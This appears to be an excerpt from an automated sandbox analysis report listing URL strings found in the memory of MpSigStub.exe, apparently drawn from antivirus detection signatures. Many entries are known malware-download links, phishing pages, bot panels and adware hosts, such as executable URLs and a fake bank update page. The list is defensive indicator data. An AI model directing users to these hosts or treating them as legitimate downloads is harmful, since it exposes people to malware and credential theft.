Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://stilldesigning.com/wp-content/themes/stilldesigning-2014/langu
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://strategosvideo4.com/1547.avi.exe
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://studiojagoda.pl/invoice-receipt/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://stumptowncreative.com/important-please-read/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://sucesores.com.mx/images/logo.gif
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://superbit.rs/wp-content/themes/one-page/js/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://superdoor.ch/media/jui/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://superfast.com.sapo.pt/fotos.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://superkahn.ru:8080/index.php
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://superpuperdomain.com/count.php?ref=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://survey.news.sina.com.cn/polling.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://sustainabletourismint.com/la)
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://systemjhockogyn.com.br/boa.php
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://t.awcna.com/mail.jsp?js
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://t.co/
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://t.jdjdcjq.top/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://t.tr2q.com
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://taggsalimentos.com.br/pdf/login.htm
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tak-tik.site/crun20.gif
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://tamus.cz.cc/el/load.php?spl=javad
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://tbapi.search.ask.comxb
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://techwach.com
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://temp.hbsouthmomsclub.com:8080/gnutella.js
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://tendancekart.com/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://test.1g.io:3000
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://test.ru/botadmin/index.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/updates.doc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://thespecsupportservice.com/uno.dat
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://tiasissi.com.br/revendedores/jquery/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://tibiahack.czweb.org/adduser.php?num=
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://tikotin.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://tiny.cc/Tiktok-Pro
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/h7okabu)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/hop4az9)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jfrwrhe)
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jy69pnw)
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/oc725yj
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://tissueling.com
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://titiaredh.com/redirect/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://titulospdf.ddns.net
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://tixwagoq.cn/in.cgi?14
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://tjuegost.info/downloads.html
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://tldrnet.top/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://tool.tesvz.com/images/nxz375.jpg
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://torscreen.org
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
Source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp	String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://traderspusers.hol.es/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/D
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://trail.filespm.com/dealdo/install-report
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://trik.ws/p.jpg
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://trik.ws/pc.exeg
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv1.ws
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://turtleone.zapto.org/out.rtf
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://twitck.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/PbrTEg
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/sqivdw)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://unitedcrew.netd
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://update.7h4uk.com:443/antivirus.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://update.sykehuspartner.no/splunk/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://urefere.org/opxe.exe
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://urels.ml/sokha2.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://url.fzpmh.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://uwibami.com/indexx.php)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://vbatools.pl/lista-aplikacji/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://vequiato.sites.uol.com.br/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://verred.net/?1309921
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://verticalagriculture.net/files/csrss.jar
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://videosoftonline.com/download
